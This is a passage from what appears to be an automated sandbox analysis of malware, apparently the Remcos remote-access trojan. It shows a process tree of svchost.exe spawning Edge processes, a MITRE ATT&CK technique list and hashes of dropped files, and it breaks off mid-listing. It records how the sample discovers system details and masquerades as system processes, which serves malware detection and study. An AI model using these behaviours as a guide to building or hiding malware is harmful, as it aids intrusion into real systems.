        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6264 /prefetch:1
        7⤵
        
        PID:5968
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6376 /prefetch:1
        7⤵
        
        PID:5988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
        7⤵
        
        PID:5920
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
        7⤵
        
        PID:5428
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
        7⤵
        
        PID:6008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
        7⤵
        
        PID:116
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
        7⤵
        
        PID:3716
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6784 /prefetch:1
        7⤵
        
        PID:3016
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6172 /prefetch:1
        7⤵
        
        PID:4616
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1
        7⤵
        
        PID:5988
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
        7⤵
        
        PID:6076
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7104 /prefetch:1
        7⤵
        
        PID:5076
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7000 /prefetch:1
        7⤵
        
        PID:5572
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7004 /prefetch:1
        7⤵
        
        PID:3748
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7232 /prefetch:1
        7⤵
        
        PID:1476
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7556 /prefetch:1
        7⤵
        
        PID:1940
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7336 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:464
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7200 /prefetch:1
        7⤵
        
        PID:1816
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,3655619540240822673,6078938164120465870,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7728 /prefetch:1
        7⤵
        
        PID:3948
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:936
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:3116
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2560
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:1908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:3068
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5604
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:5624
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5632
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:6080
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xe4,0x114,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:6096
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:3620
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5848
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:3584
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:5320
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:6072
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:5700
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5688
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:4136
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:4996
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:3356
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:5508
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2316
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:3224
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xd8,0x100,0x104,0xfc,0x108,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:5276
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:6036
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:5052
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2008
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:4656
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0x7c,0x10c,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:4876
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:2816
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffca9be46f8,0x7ffca9be4708,0x7ffca9be4718
        7⤵
        
        PID:4824
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:184

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4004

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
218B

MD5
a48d1f2eef94a71c3c77e4081924cd02

SHA1
1e93c5f709ce2f00fa5aa581a6f247aa4cc075ec

SHA256
eb4ddd14458e953e9f0c4c97bed33fb26fa0d53b81ce9d521d14b84c9ccaf58e

SHA512
678dd461b7202d90785adfd85a10ae7501ee7a2d1d3809dc04cc2196f874f10075a81d0f10147fdbf0e848fe9ac495b95bc46ed00b70053fdd6468e26c2d917c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2783c40400a8912a79cfd383da731086

SHA1
001a131fe399c30973089e18358818090ca81789

SHA256
331fa67da5f67bbb42794c3aeab8f7819f35347460ffb352ccc914e0373a22c5

SHA512
b7c7d3aa966ad39a86aae02479649d74dcbf29d9cb3a7ff8b9b2354ea60704da55f5c0df803fd0a7191170a8e72fdd5eacfa1a739d7a74e390a7b74bdced1685

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ff63763eedb406987ced076e36ec9acf

SHA1
16365aa97cd1a115412f8ae436d5d4e9be5f7b5d

SHA256
8f460e8b7a67f0c65b7248961a7c71146c9e7a19772b193972b486dbf05b8e4c

SHA512
ce90336169c8b2de249d4faea2519bf7c3df48ae9d77cdf471dd5dbd8e8542d47d9348080a098074aa63c255890850ee3b80ddb8eef8384919fdca3bb9371d9f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
